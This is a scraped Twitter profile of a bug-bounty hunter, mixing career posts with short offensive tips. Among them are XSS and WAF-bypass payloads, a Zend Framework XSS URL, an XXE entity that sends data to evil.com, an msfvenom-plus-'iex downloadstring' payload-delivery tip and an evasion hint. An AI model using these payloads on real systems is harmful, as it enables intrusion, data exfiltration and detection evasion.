celesian @c3l3si4n Twitter profile

Last Seen Profiles

@jesusodep

@0xdhruva

@Zulqarn52997883

@83drifter

@_Chugege_

@KorlyNBP

@Gr8_nex

@stw_pdg

@AWOAdvocacy

@MetalMamaLady

@rxkuuu_

@doc7090

@los_oscos

@DetroitTitansSB

@woramangra

@metheridge

@VANYFOXX

@seckmansoftball

@colinh241

@Whowaa

@Zara_Leamon1

@NicolasWFreeman

@rallygoat

@BrigetMs

@LaVidaEsBellaGT

@Worldsoldestham

@IreneMalok

@LiliT941192

@Kristoff87

@oneAPI_register

@ciinnamorroll

@yy3971770923683

@1_maal

@woramangra

@SirSwagYT

@PUTIN_PTI

celesian

@c3l3si4n

2 years

This new trick for turning any PHP LFI to RCE is awesome! I've been wondering why it didn't get more attention since it works better than any other LFI2RCE techniques out there (such as expect://).Props to @loknop for publishing this technique initially👏

25

367

1K

celesian

@c3l3si4n

3 years

Google's ReCAPTCHA will automatically fingerprint Burp Suite Proxy and raise the challenge difficulty to the maximum, making analysis of the app very irritating. To fix this, go into your Burp Suite Project Configurations and activate TLS Passthrough for

9

117

324

celesian

@c3l3si4n

3 years

Nuclei < v2.5.2 was vulnerable to RCE. I found that you could achieve RCE by using a malicious .yaml template and exploiting nuclei's headless browser feature, which runs with sandbox disabled. Thanks @pdnuclei for the quick update and fix. PoC:

POC demonstrating RCE on Nuclei v2.5.1. The following PoC will execute `touch /tmp/rce_on_nuclei`....

POC demonstrating RCE on Nuclei v2.5.1. The following PoC will execute `touch /tmp/rce_on_nuclei`. JS exploit based on CVE-2021-21224 PoCs - nuclei-rce.yaml

gist.github.com

3

66

308

celesian

@c3l3si4n

2 months

thank you @PortSwigger

13

16

298

celesian

@c3l3si4n

11 months

Sharing my experience with alias path traversals on nginx, and how we leaked sensitive data on Bitwarden and GCP with that. Along with that, we also released a tool called navgix to check for the presence of these vulnerabilities in an automated manner.

Hunting for Nginx Alias Traversals in the wild

Nginx, a versatile web server pivotal to numerous internet infrastructures, has held a dominant market share since its inception in 2004, with widespread adoption across websites and Docker contain...

labs.hakaioffsec.com

8

104

237

celesian

@c3l3si4n

2 years

Here's a quick Google dork I've made for finding GitHub profiles of company's employees. "Seeing something unexpected? Take a look at the GitHub profile guide." "shopify" site:

8

53

228

celesian

@c3l3si4n

2 years

Finally got this.. feels quite underwhelming now.🥳

13

8

223

celesian

@c3l3si4n

3 years

denovo.. finalmente..

12

5

170

celesian

@c3l3si4n

2 years

Yay, I was awarded a $3,000 bounty on @Hacker0x01 ! For this bug, i pulled recon data from @trick3st and ran some automations of my own to detect sensitive information on all programs in the repository.

GitHub - trickest/inventory: Asset inventory of over 800 public bug bounty programs.

Asset inventory of over 800 public bug bounty programs. - trickest/inventory

github.com

0

30

143

celesian

@c3l3si4n

5 months

This is a very unknown technique. Tried googling it and found no results, so maybe even a novelty. This allows you to dump all domains from a Cloudflare user by doing nameserver correlation. Great for finding base domains owned by the company.

1

24

138

celesian

@c3l3si4n

2 years

Just reported my first HTTP Request smuggling on @Hacker0x01 . Thanks to @albinowax for his amazing research and for sharing with us the new CL.0/H2.0 vector! 😄😄

3

8

136

celesian

@c3l3si4n

7 months

If you're not using quickcert, you may be missing out on quite a lot of subdomains depending on your target 🔥 Running quickcert lead me to finding 1186 new subdomains that were not found by subfinder's APIs. Long hail alternate subdomain enumeration methods 😃

celesian

@c3l3si4n

8 months

A better way of querying certificate transparency logs

2

11

64

4

20

126

celesian

@c3l3si4n

1 year

Here's a quick XSS 0day for Zend Framework 1.*. It was considered deprecated on 2016, but there's still 132533 installs on composer. /vendor/diablomedia/zendframework1-http/tests/Zend/Http/Client/_files/testRedirections.php?redirection=3¶m=<img/src=x%20onerror=alert(1)>

3

30

125

celesian

@c3l3si4n

2 months

Just finished 3rd place, out of 9186 players on this last HackTheBox season. Falling just behind @xct_de and @snowscan . Thank you very much for the competition @hackthebox_eu ! Keeping this pace going was not very healthy suffice to say 🤪

11

2

121

celesian

@c3l3si4n

2 months

5

13

99

celesian

@c3l3si4n

2 years

turning a DOM Open Redirect into a XSS with the following trick. var callback_url = " javascript:alert(1)"; // <--- reflected parameter document.location.href = callback_url;

0

13

93

celesian

@c3l3si4n

10 months

throwback to the coolest PoC video i've sent (v8 rce on mordhau)

3

11

87

celesian

@c3l3si4n

3 years

A great way to find out more about the infrastructure of an website when doing a pentest: Put this e-mail address on a sign-up form: attacker@<your vps ip> Then on your VPS run: nc -lvnp 25 Of course, that's not fixable because its standard behaviour. :))

1

12

89

celesian

@c3l3si4n

3 years

thinking about this..

2

9

85

celesian

@c3l3si4n

2 years

TIL: You can dump cache keys and other Akamai CDN data by sending a request with the Pragma Header to a site that uses Akamai.

0

18

80

celesian

@c3l3si4n

3 years

Today, me and @thau0x01 managed to develop a working PoC code for the new ProxyLogon (CVE-2021-26855) Microsoft Exchange 2019 vulnerability containing a full SSRF to Arbitrary File Write exploit chain. I also have to thank PRIDE Security for the support in this journey. :)

5

10

71

celesian

@c3l3si4n

1 year

🥳🎉🎉🎉

6

0

72

celesian

@c3l3si4n

3 months

First Pro Labs completed! This one being Zephyr! The lab included multiple attacks on AD environments, such as ACL abuse, Relay attacks, Kerberos attacks, Forest/Trust attacks, Network Pivoting, SQL Server attacks, Linux Privilege Escalation and Web Hacking.

4

0

72

celesian

@c3l3si4n

3 years

Adobe filed CVE-2021-40721 for my report, which was a XSS vulnerability i submitted to their VDP program on @Hacker0x01

6

4

71

celesian

@c3l3si4n

1 year

Released a new authenticated RCE for GLPI, specially it's plugin "order" (installed on many systems), which unserialize()'d a $_POST parameter, making RCE possible with a monolog gadget.

huntr Hacktivity

@huntrHacktivity

1 year

pluginsglpi/order disclosed a bug reported by @c3l3si4n - Patch: #hunter #infosec #opensource

0

3

10

1

8

65

celesian

@c3l3si4n

2 years

Submitted a critical report today after some time off ^^, feels good to be back i guess.. Let's hope that's not a dupe. :p

5

0

66

celesian

@c3l3si4n

8 months

A better way of querying certificate transparency logs

GitHub - c3l3si4n/quickcert: A better way of querying certificate transparency logs

A better way of querying certificate transparency logs - c3l3si4n/quickcert

github.com

2

11

64

celesian

@c3l3si4n

3 years

não se apeguem ao técnico, hacking não é tudo na nossa. ida. faça amigos, saia, conheça as drogas, se DIVIRTA. isso foi algo que faltou na minha vida, quando comecei a nao ser mais tao solitario, descobri um novo significado na vida

8

2

58

celesian

@c3l3si4n

3 years

Just got into @SynackRedTeam c:

6

0

55

celesian

@c3l3si4n

3 years

Started doing the Offshore pro labs on @hackthebox_eu , pretty fun and challenging laboratory so far.

2

1

56

celesian

@c3l3si4n

4 months

Subfinder exists for more than 5 years now, and they added pagination now? How come this issue hasn't been a higher priority earlier? Just imagine the amount of bounties lost due to researchers trusting PDiscovery's tools to do the basic.🤦

ProjectDiscovery.io

@pdiscoveryio

4 months

Wow! Subfinder just got even more powerful with updates for handling multiple data sources, including pagination issues with many of them. We're excited to see what you all find! And thanks to ZuoJunhao and kelvinatorr for first time contributions!

2

5

75

5

4

56

celesian

@c3l3si4n

2 years

My exploit for the newest polkit privilege escalation vulnerability affecting polkit <0.120

GitHub - c3l3si4n/pwnkit: PoC for the CVE-2021-4034 vulnerability, affecting polkit < 0.120.

PoC for the CVE-2021-4034 vulnerability, affecting polkit < 0.120. - c3l3si4n/pwnkit

github.com

1

10

54

celesian

@c3l3si4n

15 days

Crazy awesome research by @cfreal_ , many CVEs coming from this.

offensivecon

@offensive_con

15 days

Iconv, Set the Charset to RCE: Exploiting the Glibc To Hack the PHP Engine by @cfreal_ now on stage!

2

7

101

2

3

54

celesian

@c3l3si4n

2 years

H2HC was completely insane. So happy to see so many faces I only knew on the internet. It was tiresome but filled with joy and love. Thank you very much guys 🥺

3

0

54

celesian

@c3l3si4n

3 years

Yay i just got my first Bug Bounty, where i was awarded a $750 bounty on @Hacker0x01 ! :)))))) #TogetherWeHitHarder

8

1

51

celesian

@c3l3si4n

3 years

:3

1

0

52

celesian

@c3l3si4n

3 years

The last few days, i've submitted 5 reports to @Hacker0x01 , with 2 being invalid, 1 being a dupe and only 2 reports being accepted. Thank you @pry0cc , @pdiscoveryio and @Burp_Suite for making such awesome tools.

1

3

49

celesian

@c3l3si4n

10 months

The last Mozilla Hall of Fame entry 😋

2

0

47

celesian

@c3l3si4n

16 days

😄😄

celesian

@c3l3si4n

16 days

I'm at Berlin for @offensive_con (thanks @Binary_Gecko ), if anyone wants to hangout and talk about anything, hit me up!

3

2

34

4

0

46

celesian

@c3l3si4n

3 months

Nice machine :)

HackTheBox First Bloods

@HackTheBloods

3 months

celesian got 1st blood owning "root" on Perfection!

0

7

3

0

45

celesian

@c3l3si4n

3 years

Yay, I was awarded a $400 bounty on @Hacker0x01 ! #TogetherWeHitHarder

HackerOne profile - celesian

19y | web hacking & ctfs - https://celes.in

hackerone.com

3

0

42

celesian

@c3l3si4n

4 years

@nviitt programas de escritório = programador

1

2

39

celesian

@c3l3si4n

3 years

New patch for my first ever CVE just got released. Thanks to the @OpenVPN team for quick response :)

2

1

40

celesian

@c3l3si4n

3 years

In an internal pentest, always keep an eye out for Java-RMI services. Those have several misconfigurations which can lead to RCE, as well as exporting useful functions (addUser, runCMD) which can be called and accessed by the JDK jprofiler tool.

2

37

celesian

@c3l3si4n

3 years

Don't let the internet rush you, no one is posting their failures

2

5

36

celesian

@c3l3si4n

2 years

Yay, I was awarded a $1,500 bounty on @Hacker0x01 ! #TogetherWeHitHarder

HackerOne profile - celesian

19y | web hacking & ctfs - https://celes.in

hackerone.com

celesian

@c3l3si4n

2 years

Submitted a critical report today after some time off ^^, feels good to be back i guess.. Let's hope that's not a dupe. :p

5

0

66

3

1

37

celesian

@c3l3si4n

3 years

I made my first blog post, explaining how you can make a self-destruct password on Linux with a few lines of code.

3

7

37

celesian

@c3l3si4n

3 years

11

0

36

celesian

@c3l3si4n

1 month

Very neat trick!!!

pilvar

@pilvar222

1 month

This Friday, I'm presenting a novel technique as part of my talk "Secret web hacking knowledge - CTF authors hate these simple tricks". I've made a challenge about it, will you be able to pop an alert on ? The whole source code is in the screens below :)

9

31

206

2

1

36

celesian

@c3l3si4n

3 years

Blocked: <img src=x onerror=alert(1)> Bypassed: <x style=animation-name:fadeIn onanimationstart=(function(){g=alert;/**/g(1)})() ></x> WAF Bypassing can be fun ¯\_(ツ)_/¯

1

6

36

celesian

@c3l3si4n

2 years

Yay, I was awarded a $500 bounty on @Hacker0x01 ! #TogetherWeHitHarder

HackerOne profile - celesian

19y | web hacking & ctfs - https://celes.in

hackerone.com

5

0

36

celesian

@c3l3si4n

20 days

@vxunderground MAS has been the go-to way for activating Windows for quite a few years already.

2

0

35

celesian

@c3l3si4n

16 days

I'm at Berlin for @offensive_con (thanks @Binary_Gecko ), if anyone wants to hangout and talk about anything, hit me up!

3

2

34

celesian

@c3l3si4n

1 year

I recently developed a minimal rootkit for Linux systems that made use of "KProbes" to hook internal kernel functions. This rootkit was created as a way to show the power of KProbes in rootkits. I greatly used @ryan_elfmaster 's phrack paper as reference.

GitHub - c3l3si4n/robson: Robson is a simple LKM rootkit that uses the Linux kernel's kprobes...

Robson is a simple LKM rootkit that uses the Linux kernel's kprobes tracing feature as a hooking mechanism. - c3l3si4n/robson

github.com

0

4

34

celesian

@c3l3si4n

3 years

Yay, I was awarded a $3,000 bounty on @Hacker0x01 ! #TogetherWeHitHarder

HackerOne profile - celesian

19y | web hacking & ctfs - https://celes.in

hackerone.com

4

0

34

celesian

@c3l3si4n

2 years

Here's a quality of life improvement for Burp Suite. Install the uBlock Origin extension on Burp's integrated browser, because it wil filter most of the useless requests and allow your proxy history to be clear of third-party tracking library requests.

0

2

33

celesian

@c3l3si4n

2 years

A lot of blue-team people use User-Agents as a way to identify and group requests of an attacker. Use that to your advantage and randomize your user-agent on every request.

2

0

32

celesian

@c3l3si4n

3 years

Just got an @SynackRedTeam invite from the recent @hackthebox_eu tournament i participated in. I hope i pass their interview now. :P

3

0

32

celesian

@c3l3si4n

3 years

Yay, I was awarded a $750 bounty on @Hacker0x01 ! #TogetherWeHitHarder

HackerOne profile - celesian

19y | web hacking & ctfs - https://celes.in

hackerone.com

5

1

32

celesian

@c3l3si4n

2 years

Just released this new tool for decluttering and cleaning URL lists. It is very flexible, with some arguments for controlling the aggressiveness of the tool. Check it out

GitHub - c3l3si4n/godeclutter: Declutters URLs in a fast and flexible way, for improving input for...

Declutters URLs in a fast and flexible way, for improving input for web hacking automations such as crawlers and vulnerability scans. - GitHub - c3l3si4n/godeclutter: Declutters URLs in a fast and...

github.com

2

11

31

celesian

@c3l3si4n

2 months

@hackthebox_eu @snowscan @xct_de you guys got my username wrong 😞

1

0

31

celesian

@c3l3si4n

8 months

Just a reminder that my open-source tool “thankunext” does that automatically.

GitHub - c3l3si4n/thankunext: Easily gather all routes related to a NextJs application through...

Easily gather all routes related to a NextJs application through parsing of _buildManifest.js - c3l3si4n/thankunext

github.com

Vidoc Security Lab

@vidocsecurity

8 months

Find hidden pages and ".js" files in Next.js applications (find what other hunters miss) Opensea as an example 👇 1/5

1

22

93

1

2

31

celesian

@c3l3si4n

2 years

🥳🎉

HackTheBox First Bloods

@HackTheBloods

2 years

celesian got 1st blood owning root on UpDown!

0

6

3

0

30

celesian

@c3l3si4n

3 years

ffuf now shows the server response times for each request! this is a huge win for blind attacks :))))

0

3

27

celesian

@c3l3si4n

2 years

Just one small positive thought in the morning can change your whole day.

0

28

celesian

@c3l3si4n

2 years

Just published an article about using Twitter in hacking!

0

4

28

celesian

@c3l3si4n

4 years

Today i made my first heap exploit a use-after-free bug on glibc version 2.27 exploited with a tcache duplication technique. I'd like to thank everyone who helped me with this and gave me tips on how to study or answered questions I had. Keep pwning!

3

1

26

celesian

@c3l3si4n

3 years

This whole recon/automation stuff in Bug Bounty is a huge trap. Don't use one liners from twitter and don't listen to "success" stories. Do your own stuff, come up with your own vectors and techniques. #BugBounty #bugbountytips

1

5

27

celesian

@c3l3si4n

2 years

Foi mto legal ver todo mundo na RoadSec, nunca fui em uma conferencia antes entao fiquei feliz em ver todos os rostos que eu apenas via na Internet anteriormente.

2

0

27

celesian

@c3l3si4n

3 years

Yay, I was awarded a $500 bounty on @Hacker0x01 ! #TogetherWeHitHarder

HackerOne profile - celesian

19y | web hacking & ctfs - https://celes.in

hackerone.com

3

0

26

celesian

@c3l3si4n

2 years

😶

BirdsArentReal CTF

@barctf

2 years

Congrats to @c3l3si4n for taking first user blood on Admirer Too @hackthebox_eu ! Look at how happy he is!

2

0

41

3

0

25

celesian

@c3l3si4n

3 years

@GuidedHacking Did you know that if you return a 444 code on nginx, it will drop the connection without returning any response? It might be interesting for fooling the script kiddies.

3

5

25

celesian

@c3l3si4n

3 years

Converting a Masscan output file to ip:port format. awk -F ' ' '{print($6,":",$4)}' masscan-port-22.txt|tr -d ' '|sed 's/\/.*//g'

1

4

25

celesian

@c3l3si4n

29 days

bae wake up new dompurify bypass released

Cure53

@cure53berlin

29 days

DOMPurify 3.1.1 & 2.5.1 have been released. Both are security releases & should be upgraded to asap. Note: More releases might follow, the mitigated attack is novel. Eternal gratitude goes to @IcesFont for finding, reporting & helping with fixes 🙇

6

42

144

0

1

25

celesian

@c3l3si4n

3 years

Recon is so fun!

4

1

25

celesian

@c3l3si4n

2 years

esse BeerOrCoffee é legalzinho eim

1

0

24

celesian

@c3l3si4n

4 years

Everybody knows .js.map files can allow you to recover your source code, but did you know Chrome now has support for debugging these .map files? (Breakpoints, Variable Monitoring, etc.) #bugbountytips

1

8

24

celesian

@c3l3si4n

3 years

This is not working for you? <!ENTITY xxe SYSTEM "">]> Try this: <!ENTITY xxe SYSTEM "file://evil.com:21/&data;">]>

1

3

22

celesian

@c3l3si4n

3 years

APIs that encrypt requests and response bodies are veri likely to contain stupid bugs, due to the false sense of security client-side encryption gives.

0

2

22

celesian

@c3l3si4n

1 year

This tool is awesome and will save a lot of time for everyone, doing this work manually was awful 🫥🫥

Rémi GASCOU (Podalirius)

@podalirius_

1 year

(1/3) I've released publicly a new tool/library called #objectwalker that I have been working on for a few months. 🥳 ObjectWalker allows you to find paths into python objects to find interesting targets, in breadth first search or depth first search! ➡️

4

75

197

1

22

celesian

@c3l3si4n

3 years

+ msfvenom -f psh + iex downloadstring = great method for getting meterpreter on modern systems

0

1

20

celesian

@c3l3si4n

2 years

From the last few weeks hunting, one thing i noticed is that Marketing Features are usually vulnerable to something. (Tracking JS code leading to XSS, Marketing API tokens exposed on JS, Investor Sites, etc.)

0

21

celesian

@c3l3si4n

3 months

lets goooo 🇩🇪🇩🇪🇩🇪🇩🇪 thank you very much for this generous opportunity @Binary_Gecko and @Ronkeybiz ! c you at offensivecon!!

Vinicius Pereira

@big0x75

3 months

In Dec 2023, I had the opportunity to participate and achieve 1st place at @h2hconference CTF! Thanks to my teammates @c3l3si4n , @beescoitu , @_regne , and to all the event staff and partners, especially @bsdaemon and @Binary_Gecko . It was amazing. See you soon in Germany guys🇩🇪!

2

6

38

0

22

celesian

@c3l3si4n

2 years

Remembering that this works with default PHP settings, allow_url_include=False and all ^^

celesian

@c3l3si4n

2 years

This new trick for turning any PHP LFI to RCE is awesome! I've been wondering why it didn't get more attention since it works better than any other LFI2RCE techniques out there (such as expect://).Props to @loknop for publishing this technique initially👏

25

367

1K

0

6

22

celesian

@c3l3si4n

3 years

PoC for the latest Linux Privilege Escalation PoC disclosed by Qualys :DD

4

7

21

celesian

@c3l3si4n

3 years

vc nao precisa ser melhor que ninguem, pra que gastar 90% do esforço pra obter 1% do aprendizado? so pegue um trampo na area e seja feliz axabou

1

0

21

celesian

@c3l3si4n

2 years

Made a quick script for mixing wordlists (raft, common, assetnote) into a single wordlist to pipe into content discovery tools. Create your own ultimate master race wordlist :P

GitHub - c3l3si4n/gentleman: quick script for mixing wordlists in a way that maintains order....

quick script for mixing wordlists in a way that maintains order. ([1,2],[3,4],[5,6] -> [1,3,5,2,4,6]) - c3l3si4n/gentleman

github.com

0

21

celesian

@c3l3si4n

3 years

1

0

18

celesian

@c3l3si4n

5 months

This can also be used to find all domains seized by the FBI. Leaving that as an exercise to the reader because I dont want to get into a list. 😁

celesian

@c3l3si4n

5 months

This is a very unknown technique. Tried googling it and found no results, so maybe even a novelty. This allows you to dump all domains from a Cloudflare user by doing nameserver correlation. Great for finding base domains owned by the company.

1

24

138

2

1

20

celesian

@c3l3si4n

3 years

Quick fix for Burp Suite sandbox errors: sudo chown root:root ~/.BurpSuite/burpbrowser/**/chrome-*; sudo chmod +s ~/.BurpSuite/burpbrowser/**/chrome-*

1

19

celesian

@c3l3si4n

2 years

Here's some cool unofficial launch options for tweaking your @Burp_Suite , for improving look and feel or performance.

1

5

20

celesian

@c3l3si4n

4 months

@LiveOverflow Yes, that is my point. Never trust tools because sometimes they be lacking something crucial. Just because the tool is famous doesn't mean it's always good of course.

1

0

19

celesian

@c3l3si4n

2 years

TIL: Since 2021, you can use this new LFI2RCE technique with php://filter to write any kind of content without having to upload a file or poison a log in the system. This is a great step from race-conditions and log poisoning.

2

19

celesian

@c3l3si4n

2 years

Here I used @joohoi 's ffuf -replay-proxy feature together with SSH forwarding to run network intensive scans on my Contabo VPS for getting matches on my notebook's Burp without losing scan reliability or speed. It works pretty well ;)

2

19

celesian

@c3l3si4n

2 years

trabalho 20 minutos descanso 2 horas

4

1

19

celesian

@c3l3si4n

2 years

0

3

19

celesian

@c3l3si4n

3 years

eu dedico toda a minha carreira ao teteu tutors que me ensinou a usar o computador em 2013

3

19

celesian

@c3l3si4n

3 years

Happy 24th Birthday to Nmap, may it live to be 124!

1

19

celesian

@c3l3si4n

3 years

In April, I submitted 16 vulnerabilities to 10 programs on @Hacker0x01 . #TogetherWeHitHarder

0

19

celesian

@c3l3si4n

2 years

Everybody can use this data! It will update very frequently by an automated workflow. One thing I like doing is grabbing a PoC for a recent vulnerability that is trending and checking for vulnerable instances on BB programs.

Trickest

@trick3st

2 years

We have a repository with the details (and POCs) of almost every publicly available CVE! We just added a 🔥 Hottest CVEs 🔥 table to our CVEs repository that shows the most viewed CVEs according to our analytics, and it is updated regularly! Check it 👉

0

16

78

1

18